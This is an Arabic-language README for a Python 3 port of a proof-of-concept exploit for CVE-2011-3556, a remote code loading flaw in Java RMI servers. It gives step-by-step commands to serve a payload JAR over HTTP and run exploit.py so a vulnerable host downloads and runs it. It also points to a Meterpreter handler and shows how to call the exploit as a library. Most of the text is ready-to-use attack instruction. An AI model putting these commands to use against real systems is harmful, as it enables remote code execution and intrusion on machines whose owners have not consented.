
تطبيق Python 3 لإثبات المفهوم (PoC) الحالي لـ CVE-2011-3556.
هذه الأداة هي تطبيق بلغة بايثون 3 لإثبات المفهوم (PoC) الحالي المُعد بواسطة mihi لإطار Metasploit Framework.
لاستخدام الوحدة، اتبع التعليمات أدناه ببساطة:
# Clone هذا المستودع محليًا.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/
# اختيارياً، قم بتعيين بت التنفيذ `x` لتتمكن من تشغيل النص البرمجي مباشرة.
$ chmod u+x exploit.py
$ ./exploit.py --help && echo "It works!"
لكي يتم تحميل الحمولة (ملف JAR ثنائي) عن بُعد بواسطة خادم Java RMI الضعيف، يجب تقديمها كمورد HTTP. يمكن تقديمها بسرعة باستخدام الأمر الشهير python3 -m http.server.
بمجرد أن تصبح الحمولة متاحة للتحميل، قم ببساطة بتشغيل النص البرمجي exploit.py لتفعيل الثغرة.
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`
في حال كانت الحمولة هي Meterpreter (في إطار Metasploit Framework)، لا تنسَ استخدام
use exploit/multi/handler.
يمكن استخدام هذه الوحدة أيضًا كمكتبة عن طريق استيراد وحدة cve_2011_3556 إلى نطاق التسمية الحالي:
from cve_2011_3556 import JavaRMIExploit
JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()
الأمر بسيط بهذا الشكل!
شكر خاص لـ mihi على التنفيذ الأولي لوحدة إطار Metasploit Framework.